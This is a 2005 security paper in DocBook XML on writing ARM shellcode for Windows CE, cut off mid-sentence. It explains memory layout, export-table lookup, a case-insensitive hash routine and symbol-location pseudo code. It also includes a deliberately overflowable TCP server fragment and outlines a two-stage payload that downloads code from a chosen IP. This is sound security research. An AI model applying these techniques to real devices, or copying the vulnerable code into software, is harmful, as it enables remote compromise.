<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.3//EN"
                  "http://www.docbook.org/xml/4.3/docbookx.dtd">
<!-- main doc -->
<article>

<articleinfo>
	<title>Exploring Windows CE Shellcode</title>
	<authorgroup>
		<author>
			<firstname>Tim</firstname><surname>Hurman</surname>
			<affiliation>
				<jobtitle>IT Security Consultant</jobtitle>
				<orgname>Pentest Limited.</orgname>
				<address>
					<email>timh at pentest.co.uk</email>
				</address>
			</affiliation>
		</author>
	</authorgroup>
	<copyright>
		<year>2005</year>
		<holder>Pentest Limited</holder>
	</copyright>
	<revhistory>
		<revision>
			<revnumber>1.0</revnumber>
			<date>27 June 2005</date>
			<authorinitials>TH</authorinitials>
			<revremark>Initial doc</revremark>
		</revision>
	</revhistory>
</articleinfo>

<sect1>
	<title>Introduction</title>
	<para>
Windows CE (WCE) is a Windows-like operating system for various handheld
devices, including Personal Digital Assistants (PDAs) and Mobile Phones.
While at the API level, many of the function calls and interfaces are the
same as the standard version of Windows, much of the internals have been
altered to accommodate many different types of CPUs and architectures.
	</para>

	<para>
This paper will attempt to demonstrate the principles and techniques of
exploiting WCE/ARM using an example vulnerability. Much of the information
in this paper has been extracted from various public sources and in
certain cases is used to exploit other architectures such as IA32.
	</para>

	<para>
It is assumed that the reader will have working knowledge of Windows
exploit development and a grasp of the ARM assembly language. This
knowledge is fundamental to some of the procedures and code in this
paper.
	</para>

	<para id="source">
The master copy of this document is available from <ulink url='http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.html'>http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.html</ulink>.
	</para>

	<para>
The source package is available from <ulink url='http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.tar.gz'>http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.tar.gz</ulink>.
	</para>
</sect1>


<sect1>
	<title>Windows CE memory architecture</title>

	<sect2>
		<title>Memory architecture</title>
		<para>
WCE, like Windows XP, has a full 32-bit addressable virtual memory map which
is divided in two to produce an upper 2GB of kernel space and a lower 2GB
of user space. In WCE, the lower 2GB of user space is again divided in two.
This division provides the large memory area in the upper 1GB while the
lower 1GB is divided up into a sequence of <quote>slots</quote>. Each slot
equates to a running process with slot 0 being a virtual slot on the
currently running process.
		</para>

		<para>
In WCE 3.0, each slot is 32MB in size and internally divided up into code,
stack, heap and DLL space. Thus, WCE 3.0 may only have 32 processes
running at any moment in time. WCE .NET alters this and uses 64MB slots,
however, the process limit is maintained at 32. This is due to a trick
whereby read only ROM DLLs are mapped into the upper 32MB. This area is
constant across all processes regardless of which DLLs are required by a
specific process. Some documentation refers to the upper 32MB occupying
slot 1, however this implies that the maximum process number has decreased
by one, and is therefore incorrect.
		</para>
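		<para>
The slot arithmetic described above can be sketched in C. This is an
illustrative sketch only: the names <varname>SLOT_SHIFT</varname>,
<function>slot_base</function>, <function>slot_of</function> and
<function>slots_in_lower_gb</function> are hypothetical and are not taken
from the WCE source, and it is assumed that slots are laid out
contiguously in 32MB steps from address zero.
		</para>

		<programlisting><![CDATA[#include <stdint.h>

/* Hypothetical names, for illustration only. */
#define SLOT_SHIFT 25u                  /* 2^25 bytes = 32MB per slot */
#define SLOT_SIZE  (1u << SLOT_SHIFT)

/* Base address of slot n, assuming slots are contiguous from address 0. */
static uint32_t slot_base(uint32_t n)
{
    return n << SLOT_SHIFT;
}

/* Index of the 32MB slot that contains addr. */
static uint32_t slot_of(uint32_t addr)
{
    return addr >> SLOT_SHIFT;
}

/* Number of 32MB slots that fit in the lower 1GB of the address space. */
static uint32_t slots_in_lower_gb(void)
{
    return 0x40000000u / SLOT_SIZE;
}
]]></programlisting>

		<para>
Under these assumptions, 0x01ffffff is the last byte of slot 0 and
0x02000000 is the first byte of the following 32MB region, which agrees
with the 32MB boundaries quoted throughout this section.
		</para>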

		<para>
The differences in the WCE 3.0 and .NET virtual memory layouts can be seen
in <xref linkend="wincememory"/>.
		</para>

		<figure id="wincememory">
			<title>Windows CE Slot 0 layout</title>
			<mediaobject>
				<imageobject>
					<imagedata align="center" fileref="images/wince_slot0.jpg" format="JPEG"/>
				</imageobject>
			</mediaobject>
		</figure>
	</sect2>

	<sect2 id="memlayout">
		<title>DLLs, Heaps, Slots, Stacks and XIP</title>
		<titleabbrev id="memlayout_short">DLLs, Heaps, Slots, Stacks and XIP</titleabbrev>
		<para>
Taking a closer look at the slot layout, it can be seen that DLLs are
loaded in a top down manner starting with the eXecute In Place (XIP) DLLs.
The XIP DLLs are ROM based libraries that have read/write sections located
elsewhere within memory. For all intents and purposes, these can be used
as a standard DLL from the API level. In WCE 3.0, the XIP DLLs are loaded
from 0x01ffffff (32MB) down. In WCE .NET, XIP DLLs are loaded from
0x03ffffff (64MB) down to 0x02000000 (32MB). A non-XIP DLL may not be
loaded into this memory area.
		</para>

		<para>
Other DLLs are loaded below the end of the XIP area in WCE 3.0, or from
0x01ffffff (32MB) down in WCE .NET. Different DLLs may not occupy the same address
range in different processes, just as the same DLL may not occupy a
different address range in different processes. This implies that memory
is reserved for a DLL in all processes if it is loaded in one. This was
the core reason for the XIP space in WCE .NET. The loading of DLLs
decreases the usable application space in all processes, even if none of
the threads in a process is using the DLL. This process is illustrated in
<xref linkend="dll_load"/>, where space for all three DLLs is reserved in
all three processes, even if the DLL is not in use.
		</para>

		<figure id="dll_load">
			<title>Windows CE DLL loading</title>
			<mediaobject>
				<imageobject>
					<imagedata align="center" fileref="images/dll_load.jpg" format="JPEG"/>
				</imageobject>
			</mediaobject>
		</figure>

		<para>
The application code is loaded into virtual memory starting at address
0x10000. Above that sits the read only space, then the read write space,
the heap and finally the stack. This data grows up to meet the DLL space
growing downwards toward it.
		</para>
	</sect2>

	<sect2>
		<title>The Stack</title>
		<para>
WCE operates the ARM processor in little endian mode (ARM is switchable
between big and little endian). The stack is fully descending with the
stack pointer placed at the last item (lowest address). This processor
configuration should be familiar to IA32 programmers.
		</para>

		<para>
It should be noted at this point that WCE makes little or no use of the
frame pointer. The Microsoft APCS specifies modes where the frame pointer
is used, however in practice it was found that stack variables are
specified as an offset to the stack pointer. When exploiting WCE, the
frame pointer should not be relied upon to give the value of the current
frame address. Instead the frame pointer points to the start of the entire
stack (which is the first frame).
		</para>
	</sect2>

	<sect2>
		<title>Register descriptions</title>
		<table frame='all' id="registerdesc">
			<title>Register Descriptions</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Register' colwidth="2cm" />
			<colspec colname='Affinity' colwidth="2cm"/>
			<colspec colname='Aliases' colwidth="2cm"/>
			<colspec colname='Description' colwidth="10cm"/>
			<thead>
				<row>
					<entry>Register</entry>
					<entry>Affinity</entry>
					<entry>Aliases</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>R0</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Argument 0, return value.</entry>
				</row>
				<row>
					<entry>R1</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Argument 1. If argument 0 or the return value is larger than 32 bit, the second half goes in here.</entry>
				</row>
				<row>
					<entry>R2,R3</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Arguments.</entry>
				</row>
				<row>
					<entry>R4-R10</entry>
					<entry>Permanent</entry>
					<entry></entry>
					<entry>General registers. R7 is the THUMB Frame Pointer (FP).</entry>
				</row>
				<row>
					<entry>R11</entry>
					<entry>Permanent</entry>
					<entry>FP</entry>
					<entry>Frame Pointer.</entry>
				</row>
				<row>
					<entry>R12</entry>
					<entry>Temporary</entry>
					<entry>IP</entry>
					<entry>General register. GCC/GAS knows this as IP.
This register is used to hold the size of the stack allocated by a
function in a <quote>release</quote> binary.</entry>
				</row>
				<row>
					<entry>R13</entry>
					<entry>Permanent</entry>
					<entry>SP</entry>
					<entry>Stack Pointer.</entry>
				</row>
				<row>
					<entry>R14</entry>
					<entry>Permanent</entry>
					<entry>LR</entry>
					<entry>Link Register (BL instruction stores the return address here).</entry>
				</row>
				<row>
					<entry>R15</entry>
					<entry>Permanent</entry>
					<entry>PC</entry>
					<entry>Program Counter.</entry>
				</row>
				<row>
					<entry>PSW</entry>
					<entry></entry>
					<entry></entry>
					<entry>Program Status Word. This is where the conditional flags sit.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>
	</sect2>

	<sect2 id="chap_APCS">
		<title>APCS</title>
		<titleabbrev id="apcs_short">APCS</titleabbrev>
		<para>
The WCE ARM Procedure Call Standard (APCS) is not comparable with the
general APCS in use. For a function with four arguments or less,
each argument is placed in R0-R3 and the function is called (assuming each
argument is 32 bits in size). The function then saves R0-R3 to the stack
in ascending register order and saves old SP and LR before assigning space
for local variables. When returning, the argument space is subtracted from
the SP before loading SP and PC from the stack.
		</para>

		<para>
There exists a possibility that WCE will not save the return address for a
function. When a function uses no local variables, WCE does not save any
items on the stack. In this instance a heap variable or a stack variable
in another function may be overflowed and so the result may not be
immediately obvious.
		</para>

		<para>
This description of the APCS is only a summary of the full specification,
a link to which can be found in <xref linkend="appendix_doc"/>.
		</para>
	</sect2>

	<sect2>
		<title>Module list</title>
		<para>
Central to any exploit is the ability to call functions within the Windows
API. Before a function can be called, its address in memory must be
located. Windows CE holds a linked list of loaded DLLs, which can be
enumerated to obtain the symbol tables and therefore the function address.
		</para>

		<para>
As the source code for WCE .NET is available from Microsoft, it is
possible to trace the location of the linked list of modules without
disassembling <filename>coredll.dll</filename>, the DLL in which the
<function>LoadLibraryW</function> function exists. From an examination of
the file
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\KERNEL\loader.c</filename>,
it was found that a global variable <varname>pModList</varname> was used
exclusively to locate the beginning of the module list, however it was
not defined in that file.
		</para>

		<para>
The definition of <varname>pModList</varname> was traced and can be seen
in <xref linkend="pmodlist_def"/>. Above the <varname>pModList</varname>
definition, the <structname>PMODULE</structname> structure was found.
		</para>

		<figure id="pmodlist_def">
			<title>pModList Define</title>
			<programlisting>
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h:785</filename>
#define pModList ((PMODULE)KInfoTable[KINX_MODULES])
			</programlisting>
		</figure>
		
		<para>
The definition for <structname>KInfoTable</structname> was found in 
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h</filename> and
could be evaluated as a static address, 0xffffcb00. The value for
<varname>KINX_MODULES</varname> was found to be 9. The
<structname>KInfoTable</structname> was found to be an array of
<varname>DWORD</varname> variables, and therefore, the location of the
<structname>PMODULE</structname> linked list header was 0xffffcb24.
		</para>
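		<para>
The address arithmetic above can be checked with a few lines of C. This
is a sketch only: <varname>KINFO_TABLE_ADDR</varname> and
<function>kinfo_entry_addr</function> are hypothetical names, and the
values are simply those quoted in the text.
		</para>

		<programlisting><![CDATA[#include <stdint.h>

/* Values quoted in the text; KINFO_TABLE_ADDR is a hypothetical name. */
#define KINFO_TABLE_ADDR 0xffffcb00u    /* static address of KInfoTable */
#define KINX_MODULES     9u             /* index of the module list entry */

/* Address of KInfoTable[index], treating the table as 32-bit DWORDs. */
static uint32_t kinfo_entry_addr(uint32_t index)
{
    return KINFO_TABLE_ADDR + index * (uint32_t)sizeof(uint32_t);
}
]]></programlisting>

		<para>
Calling <function>kinfo_entry_addr</function> with
<varname>KINX_MODULES</varname> gives 0xffffcb00 + 9 * 4, which is the
0xffffcb24 stated above.
		</para>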

		<para>
The <structname>PMODULE</structname> structure contains all the relevant
information regarding each DLL. In the interests of brevity
<xref linkend="pmoduleoffsets"/> enumerates only some of the important
offsets in this structure and their meaning.
		</para>

		<table frame='all' id="pmoduleoffsets">
			<title>PMODULE useful offsets</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Offset' colwidth="2cm" />
			<colspec colname='Size' colwidth="2cm" />
			<colspec colname='Type' colwidth="2.5cm" />
			<colspec colname='Description' colwidth="8cm"/>
			<thead>
				<row>
					<entry>Offset</entry>
					<entry>Size</entry>
					<entry>Type</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>0x04</entry>
					<entry>0x04</entry>
					<entry>PMODULE *</entry>
					<entry>Pointer to next <structname>PMODULE</structname> item.</entry>
				</row>
				<row>
					<entry>0x08</entry>
					<entry>0x04</entry>
					<entry>wchar_t *</entry>
					<entry>Pointer to the module name.</entry>
				</row>
				<row>
					<entry>0x7c</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The real address of the module in memory.</entry>
				</row>
				<row>
					<entry>0x8c</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The RVA address of the export table.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>
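		<para>
As a rough illustration of how these offsets might be used, the sketch
below reads 32 bit fields out of a raw copy of the structure. The
enumerator names and both helper functions are hypothetical. Only the
offsets come from <xref linkend="pmoduleoffsets"/>, and the addition of
the base address to the export table RVA follows the pseudo code given
later in this paper.
		</para>

		<programlisting><![CDATA[#include <stdint.h>

/* Offsets from the table above; the enumerator names are hypothetical. */
enum {
    MOD_OFF_NEXT    = 0x04,   /* pointer to the next list item */
    MOD_OFF_NAME    = 0x08,   /* pointer to the module name */
    MOD_OFF_BASE    = 0x7c,   /* real address of the module in memory */
    MOD_OFF_EXP_RVA = 0x8c    /* RVA of the export table */
};

/* Read a 32-bit little endian field at a byte offset in a structure image. */
static uint32_t field32(const uint8_t *image, uint32_t offset)
{
    return (uint32_t)image[offset]
         | ((uint32_t)image[offset + 1] << 8)
         | ((uint32_t)image[offset + 2] << 16)
         | ((uint32_t)image[offset + 3] << 24);
}

/* Address of the export table: module base plus the export table RVA. */
static uint32_t export_table_addr(const uint8_t *image)
{
    return field32(image, MOD_OFF_BASE) + field32(image, MOD_OFF_EXP_RVA);
}
]]></programlisting>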

		<para>
By enumerating the <structname>PMODULE</structname> list, all modules
loaded by the kernel will be found, whether they are in use by the current
thread (paged in) or not. This means that the desired module may be found
in the list, but may have an invalid address. To prevent an exception
occurring by accessing an invalid address, only
<filename>coredll.dll</filename> should be accessed initially. Before
enumerating the symbols in any secondary libraries,
<function>LoadLibraryW</function> should be called to page the module into
memory.
		</para>

		<para>
A second list of modules can be found from the
<structname>Process</structname> structure. This is a list of only the
modules loaded by the current process, however, it requires two extra
pointer dereferences and may still require the library to be loaded into
memory (if not already in use).
		</para>
	</sect2>


	<sect2>
		<title>The Export Table</title>
		<para>

The export table contains a list of all symbols, their ordinal and
Relative Virtual Address (RVA) within the module. The
<structname>ExpHdr</structname> structure definition can be found in
<filename>WINCE500\PUBLIC\COMMON\OAK\INC\pehdr.h</filename>. This indicates
several important offsets within the structure which are listed in
<xref linkend="exphdroffsets"/>.

		</para>

		<table frame='all' id="exphdroffsets">
			<title>ExpHdr useful offsets</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Offset' colwidth="2cm" />
			<colspec colname='Size' colwidth="2cm" />
			<colspec colname='Type' colwidth="2.5cm" />
			<colspec colname='Description' colwidth="8cm"/>
			<thead>
				<row>
					<entry>Offset</entry>
					<entry>Size</entry>
					<entry>Type</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>0x18</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The number of exported symbol names.</entry>
				</row>
				<row>
					<entry>0x1c</entry>
					<entry>0x04</entry>
					<entry>uint32_t *</entry>
					<entry>List of symbol RVAs.</entry>
				</row>
				<row>
					<entry>0x20</entry>
					<entry>0x04</entry>
					<entry>char **</entry>
					<entry>List of symbol names.</entry>
				</row>
				<row>
					<entry>0x24</entry>
					<entry>0x04</entry>
					<entry>uint16_t *</entry>
					<entry>List of symbol ordinals.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>

		<para>
It should be noted that the three list items are not in sequence, thus if
a required symbol name is found at names[3], the RVA is not in RVA[3].
However, the list of ordinals and names are in sequence. Therefore, the
RVA of the required symbol would be RVA[ordinals[3]]. It is presumed that
this design was used to save memory, since if the lists were kept in order,
the list of names would be longer and contain possible NULL values.
		</para>
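		<para>
The indirection through the ordinal list can be sketched as follows.
<function>lookup_rva</function> is a hypothetical helper operating on
plain C arrays rather than a real export table, and it compares names
directly where the shellcode compares hashes.
		</para>

		<programlisting><![CDATA[#include <stdint.h>
#include <string.h>

/*
 * Return the RVA of the symbol `wanted`, or 0 if it is not exported by name.
 * names[] and ordinals[] are parallel lists; rvas[] is indexed by ordinal.
 */
static uint32_t lookup_rva(const char *const *names, const uint16_t *ordinals,
                           const uint32_t *rvas, uint32_t namecnt,
                           const char *wanted)
{
    for (uint32_t i = 0; i < namecnt; i++) {
        if (strcmp(names[i], wanted) == 0)
            return rvas[ordinals[i]];   /* not rvas[i] */
    }
    return 0;
}
]]></programlisting>

		<para>
With names {"alpha", "beta", "gamma"} and ordinals {2, 0, 3}, a lookup of
"alpha" returns the entry at index 2 of the RVA list, not the entry at
index 0.
		</para>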

		<para>
The PE-COFF header format shown above is common to other Windows
based operating systems and should be familiar to writers of IA32/x86
exploits.
		</para>

	</sect2>

</sect1>

<sect1>
	<title>The Exploitable Program</title>
	<para>
Included in the accompanying source package is the full source for the
vulnerable test program used throughout this paper. This program waits for
a connection on port 4000, and then reads data until the client
disconnects. This underpins the operation of many applications, however,
in this case the author has made a basic programming error which allows
for the buffer to be overflowed. The susceptible code can be seen in <xref
linkend="vulnerablecode"/>.
	</para>

	<figure id="vulnerablecode">
		<title>server.cpp Vulnerable code fragment</title>
		<programlisting>
char string[1024];

.
.
for(pos = 0; (i=recv(csock, buf, 1024, 0)) > 0;){
	memcpy(string+pos, buf, i);
	pos += i;
}
		</programlisting>
	</figure>
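	<para>
The fragment never compares <varname>pos</varname> plus the number of
bytes received against the size of <varname>string</varname>, so a
second 1024 byte read is copied past the end of the buffer. For contrast,
a bounds checked copy might look like the sketch below.
<function>append_bounded</function> is a hypothetical helper and is not
part of <filename>server.cpp</filename>.
	</para>

	<programlisting><![CDATA[#include <stddef.h>
#include <string.h>

/*
 * Append n bytes from src to dst at offset pos, refusing any copy that
 * would run past cap. Returns the new offset, or (size_t)-1 if the data
 * does not fit.
 */
static size_t append_bounded(char *dst, size_t cap, size_t pos,
                             const char *src, size_t n)
{
    if (pos > cap || n > cap - pos)
        return (size_t)-1;
    memcpy(dst + pos, src, n);
    return pos + n;
}
]]></programlisting>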
</sect1>


<sect1>
	<title>Shellcode</title>

	<sect2>
		<title>The Toolkit</title>
		<para>
Before writing any shellcode you will need to obtain an assembler and be
comfortable using it. An assembler that can emit a flat binary file of the
shellcode, as <command>nasm</command> does, would be the best choice. At
the time of writing no such assembler exists for this target and so
GNU AS will be used to generate the opcodes. You will need to
compile your own from source (location in <xref linkend="appendix_sw"/>),
as the assembler needs to support the <quote>arm-wince-pe</quote> target.
The Binutils package contains extra utilities required to extract the
opcodes from the resulting COFF file, and <command>hexdump</command> will
be used to display them in a format suitable for including into any C
source.
		</para>
		<para>
When testing the shellcode, it will be compiled into an executable using
<productname>Embedded Visual C++</productname>. This can be downloaded
freely from Microsoft, the location is in <xref linkend="appendix_sw"/>.
		</para>

		<warning>
			<para>
When using GNU AS to assemble the code, ensure that Binutils was
configured with <quote>arm-wince-pe</quote> as the target. Failure to
do so will generate code with invalid branch instructions. This is due to
WCE only being able to execute code on a 32 bit aligned address, and
therefore, branches are specified in a word offset rather than a byte
offset.
			</para>
		</warning>
	</sect2>

	<sect2>
		<title>Shellcode Stages</title>
		<para>
The shellcode has been divided up into two stages. The first stage
shellcode is injected during the initial exploit. The main purpose of this
code is to contact a specified IP address and download the second stage
shellcode into memory. The second stage shellcode will be placed on heap
memory to avoid the stack growing over the first or second stage
shellcode. Having downloaded the second stage, the program counter
will be set to the beginning of this code. This method allows for a much
larger and more complex second stage, which can even be compiled from C
into a binary and then extracted. This enables much faster development of
the second stage, and allows the first stage to remain almost constant.
		</para>
	</sect2>

	<sect2>
		<title>String Hashing</title>
		<para>
Part of the shellcode's operation is to obtain symbol addresses from
libraries. To obtain this information we must have a copy of the symbol
name or library name to match against. As it is both inefficient and
problematic (see <xref linkend="thezeroproblem"/>) to place the whole
string into the shellcode, a hash value will be placed there instead. The
hash has to be recreated by the shellcode and must therefore be efficient
with regard to the number of instructions used.
		</para>

		<figure id="stringhash">
			<title>String hash function</title>
			<programlistingco>
				<areaspec>
					<area id="stringhash.1" coords="7" units="linecolumn"/>
					<area id="stringhash.2" coords="9" units="linecolumn"/>
					<area id="stringhash.3" coords="11" units="linecolumn"/>
					<area id="stringhash.4" coords="12" units="linecolumn"/>
					<area id="stringhash.5" coords="13" units="linecolumn"/>
					<area id="stringhash.6" coords="15" units="linecolumn"/>
				</areaspec>
				<programlisting>/*
 * generate a hash value from a unicode/ascii string
 * args: r0 = unused, r1 = char[0],  r2 = char size, ret: r0 = hash
 * Always load bytes. We will really only be looking at ascii anyway
 */
hash_str:
    mvn    r0, #0
hash_str_loop:
    ldrb   r3, [r1]
hash_str_genhash:
    bic    r3, r3, #0x20
    eor    r0, r3, r0, ror #8
    add    r1, r1, r2
    cmp    r3, #0
    bne    hash_str_loop
hash_str_return:
    mov    pc, lr
				</programlisting>
				<calloutlist>
					<callout arearefs="stringhash.1">
						<para>
Initialise the hash register with 0xffffffff.
						</para>
					</callout>
					<callout arearefs="stringhash.2">
						<para>
Even when hashing a unicode string, only the first byte is considered
significant. This saves a series of conditionals that determine the number
of bytes to load. In reality, all of the symbols the shellcode will use are
contained in DLLs that have ASCII names.
						</para>
					</callout>
					<callout arearefs="stringhash.3">
						<para>
Convert characters to uppercase. This also has an effect on other
characters, not just [a-z]. However as long as the reference hashing in
<filename>xor_str.c</filename> is consistent, this is not a significant
problem.
						</para>
					</callout>
					<callout arearefs="stringhash.4">
						<para>
This performs the hash function by rotating r0 right by 8 bits, then
exclusive-ORing the next character.
						</para>
					</callout>
					<callout arearefs="stringhash.5">
						<para>
Advance the string position to the next character by adding the character
size held in r2 (two bytes for a 16 bit unicode character) to the current
address.
						</para>
					</callout>
					<callout arearefs="stringhash.6">
						<para>
Terminate the hashing function when '\0' is found.
						</para>
					</callout>
				</calloutlist>
			</programlistingco>
		</figure>


		<para>
<xref linkend="stringhash"/> shows the string hashing function. This
generates 32 bit word hashes which can be compared to a pre-stored value
at compile time. A hash generator, <filename>xor_str.c</filename>, is
available in the source distribution.
		</para>

		<para>

Special note should be made of the complete lack of adherence to the
<xref linkend="chap_APCS" endterm="apcs_short"/>, in order to minimise the
number of bytes used for the opcodes. One of the easiest ways to achieve
smaller bytecode is to avoid using the stack or memory, and keep
variables register bound for as long as possible. The main disadvantage of
this method is that the shellcode must keep track of what registers are in
use and what they are for. As there is no intention of returning to the
original code, registers may be used at will. Hence, in
<xref linkend="stringhash"/>, the first argument is in r1, so the hash can be
generated and returned in r0.  This saves 8 bytes which would have been
required to place the hash in r0 for the return.
		</para>

		<para>
This hash function is case insensitive, therefore the hash value of
<filename>coredll.dll</filename> will equal that of
<filename>coredll.DLL</filename>. This increases the chance that a hash
value will clash with another, however, it decreases the chance that a
certain DLL will not be found. Some distinct strings will always collide:
because the hash rotates by 8 bits per character, characters four
positions apart are exclusive-ORed into the same byte. For instance
<quote>abc2def</quote> and <quote>def2abc</quote> will both generate the
same hash value.
		</para>
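		<para>
For readers who wish to reproduce the hash values off the device, a C
model of the routine in <xref linkend="stringhash"/> is sketched below.
It is not the author's <filename>xor_str.c</filename>, which is not
reproduced in this paper; it is a straightforward translation of the
assembly that assumes a byte string (a character size of 1 in r2).
		</para>

		<programlisting><![CDATA[#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32u - n));
}

/*
 * Model of hash_str for a byte string. The terminating '\0' is folded in
 * as well, because the assembly tests for the terminator only after the
 * eor. As in the assembly, a space (0x20) also ends the loop, since the
 * bic clears it to zero.
 */
static uint32_t hash_str(const char *s)
{
    uint32_t h = 0xffffffffu;           /* mvn r0, #0 */
    uint32_t c;

    do {
        c = (uint8_t)*s++ & ~0x20u;     /* ldrb, then bic #0x20 */
        h = c ^ ror32(h, 8);            /* eor r0, r3, r0, ror #8 */
    } while (c != 0);                   /* cmp r3, #0 ; bne */

    return h;
}
]]></programlisting>

		<para>
Worked through by hand, this model gives 0xadb0bcb4 for
<filename>coredll.dll</filename>, which matches the value used in the
symbol location pseudo code later in this paper.
		</para>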

	</sect2>

	<sect2>
		<title>Symbol Location</title>
		<para>
Before either the first or second stage shellcode can start executing its
primary task, it must locate the addresses of all the symbols required.
The code for this can be found in <filename>getsyms.s</filename> which is
included into both the first and second stage shellcode.
<xref linkend="dllsymseek"/> shows the pseudo code for this DLL/symbol
location.
		</para>

		<figure id="dllsymseek">
			<title>DLL/Symbol Location Pseudo Code</title>
			<programlisting>
#define NDLLS 2 /* the number of dll hashes */
#define NSYMS 1 /* the number of symbol hashes */

uint32_t dlls[NDLLS] = {
	0xadb0bcb4, /* hash of coredll.dll */
	0xb6b9a3a2, /* hash of winsock.dll */
};

/* each hash is overwritten with the symbol address once it is found */
uint32_t sym_hashes[NSYMS] = {
	0xfdf5e1b3, /* hash of coredll.dll::realloc */
};

void findsym(PMODULE *pm)
{
	uint32_t base_addr = pm->e32.e32_vsize;
	struct ExpHdr *exp = (struct ExpHdr *)(base_addr + pm->e32.e32_unit[0].rva);
	int32_t namecnt = exp->exp_namecnt; /* signed, so the &lt; 0 test can fire */
	char **name = exp->exp_name;
	uint16_t *ordinal = exp->exp_ordinal;
	uint32_t *rva = exp->exp_eat;
	uint32_t hv;
	int32_t i;

	while (1) {
		namecnt--;
		if (namecnt &lt; 0) break;
		hv = hashstring(name[namecnt]);

		i = NSYMS;
		while (1) {
			i--;
			if (i &lt; 0) break;
			if (sym_hashes[i] != hv) continue;
			sym_hashes[i] = rva[ordinal[namecnt]] + base_addr;
		}
	}
}

void finddll(void)
{
	int32_t dllno = NDLLS;
	PMODULE *pm;
	uint32_t hv;

	while (1) {
		dllno--;
		if (dllno &lt; 0) break;
		/* 0xffffcb24 holds the pointer to the head of the module list */
		pm = *(PMODULE **)0xffffcb24;
		while (pm != NULL) {
			hv = hashstring(pm->lpszModName);
			if (hv == dlls[dllno]) findsym(pm);
			pm = pm->pMod; /* next module, offset 0x04 */
		}
	}
}
			</programlisting>
		</figure>

		<para>
The pseudo code shown in <xref linkend="dllsymseek"/> is a direct
translation of the assembly, and therefore looks untidy. This is however
optimised to reduce the number of instructions required.
		</para>

		<para>
<xref linkend="dllsymseek"/> also shows the module's base address being
stored in <structname>pm->e32.e32_vsize</structname>, even though an item
called <structname>pm->e32.e32_vbase</structname> exists. It is unknown
why this occurs, however the base address is in the
<structname>pm->e32.e32_vsize</structname> element.
		</para>

		<para>
Careful readers will note that the <function>findsym</function> function
tries to locate all symbol hashes in the current module, whether they
belong there or not. While this increases the risk of a hash collision, it
eliminates several conditionals from the shellcode and removes the problem
of the WinSock DLLs. Older versions of WCE use
<filename>winsock.dll</filename>, whilst newer versions use
<filename>ws2.dll</filename>. By specifying both of these DLLs, the
shellcode is made more portable and will run on both WCE 3.0 and WCE .NET
devices. Further investigation revealed that both
<filename>winsock.dll</filename> and <filename>ws2.dll</filename> existed
on WCE 4.2 and so the <structname>dlls</structname> array in
<xref linkend="dllsymseek"/> does not include the hash for
<filename>ws2.dll</filename>.
		</para>

		<para>

Finally, it is possible that the whole process of symbol location may not
be required. The <xref linkend="memlayout" endterm="memlayout_short"/>
section discussed XIP DLLs and how they do not move in memory, implying
that the symbol addresses do not move either. Therefore if the shellcode
is being targeted at one specific version of WCE, the symbol addresses may
be hard coded. However, since the address will be determined when the ROM
is generated, the symbol address may not be constant across multiple
vendors, even if the WCE version is constant. On the other hand,
<filename>coredll.dll</filename> and <filename>winsock.dll</filename> are
frequently used and therefore may remain constant across multiple vendors
by coincidence. Too few devices have been examined to confirm or deny this
and therefore the symbol location code was used. XIP DLLs will not be
constant across WCE 3.0 and WCE .NET devices since the memory layout was
altered.

		</para>
	</sect2>

	<sect2>
		<title>Function Calling Convention</title>
		<para>
When calling a function by address, the full 32 bit address must be
supplied. Since ARM instructions are themselves only 32 bits wide, an
arbitrary 32 bit address cannot be embedded in a single instruction. It
is also unlikely that all function addresses will fit the immediate
operand encoding, which is limited to 12 bits (8 address bits and 4
shift bits). Therefore, a stub function is required to make the hop. The
stub is well within the calling range for a local jump and also provides a
static calling address. Before calling the stub, r12 is loaded with the
real function address. The stub function then moves r12 into the program
counter to call the function.
		</para>
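		<para>
The limit of the 12 bit immediate encoding can be illustrated with a
short C check. In an ARM data-processing instruction the 4 bit field
selects a rotation of twice its value, so only an 8 bit quantity rotated
right by an even number of bits can be expressed.
<function>arm_imm_encodable</function> is a hypothetical helper written
for this illustration and is not part of the shellcode.
		</para>

		<programlisting><![CDATA[#include <stdbool.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (0 <= n < 32). */
static uint32_t rol32(uint32_t v, unsigned n)
{
    return (v << n) | (v >> ((32u - n) & 31u));
}

/*
 * True if v can be written as an 8-bit value rotated right by an even
 * number of bits, i.e. as a 12-bit ARM data-processing immediate.
 */
static bool arm_imm_encodable(uint32_t v)
{
    for (unsigned rot = 0; rot < 32; rot += 2) {
        if (rol32(v, rot) <= 0xffu)     /* undo a right-rotation by rot */
            return true;
    }
    return false;
}
]]></programlisting>

		<para>
Values such as 0xff000000 pass this check, but a typical function
address with bits set across the whole word does not, which is why the
address is loaded into r12 from memory rather than encoded directly.
		</para>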
	</sect2>

	<sect2>
		<title>Shellcode Issues</title>
		<sect3>
			<title>Caches and Buffers</title>
			<para>
The ARM processor is based on the Harvard architecture rather than the
